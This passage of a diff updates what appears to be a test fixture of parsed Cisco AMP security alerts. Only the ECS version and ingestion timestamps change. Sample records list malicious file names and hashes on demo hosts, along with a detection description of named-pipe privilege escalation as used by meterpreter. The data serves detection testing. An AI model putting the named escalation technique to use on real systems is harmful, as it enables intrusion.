Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -275,7 +275,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -307,7 +307,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469618886Z",
+                "ingested": "2021-09-13T18:06:41.546089852Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -368,7 +368,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -394,7 +394,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469620841Z",
+                "ingested": "2021-09-13T18:06:41.546091935Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -481,7 +481,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -507,7 +507,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469622790Z",
+                "ingested": "2021-09-13T18:06:41.546093998Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -591,7 +591,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -617,7 +617,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469624731Z",
+                "ingested": "2021-09-13T18:06:41.546096107Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -701,7 +701,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -727,7 +727,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469626640Z",
+                "ingested": "2021-09-13T18:06:41.546098190Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -811,7 +811,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -837,7 +837,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469628547Z",
+                "ingested": "2021-09-13T18:06:41.546100246Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -921,7 +921,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -947,7 +947,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469630455Z",
+                "ingested": "2021-09-13T18:06:41.546102333Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -1031,7 +1031,7 @@
             },
             "@timestamp": "2021-01-15T10:37:43.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1057,7 +1057,7 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-12T17:31:04.469632385Z",
+                "ingested": "2021-09-13T18:06:41.546104374Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
@@ -1114,7 +1114,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1134,7 +1134,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:04.469634316Z",
+                "ingested": "2021-09-13T18:06:41.546106398Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:32:58.000Z",
@@ -1197,7 +1197,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1229,7 +1229,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469636399Z",
+                "ingested": "2021-09-13T18:06:41.546108632Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1287,7 +1287,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1307,7 +1307,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:04.469638309Z",
+                "ingested": "2021-09-13T18:06:41.546110725Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:24:58.000Z",
@@ -1367,7 +1367,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1399,7 +1399,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469640203Z",
+                "ingested": "2021-09-13T18:06:41.546112777Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1456,7 +1456,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1484,7 +1484,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469642099Z",
+                "ingested": "2021-09-13T18:06:41.546114815Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat 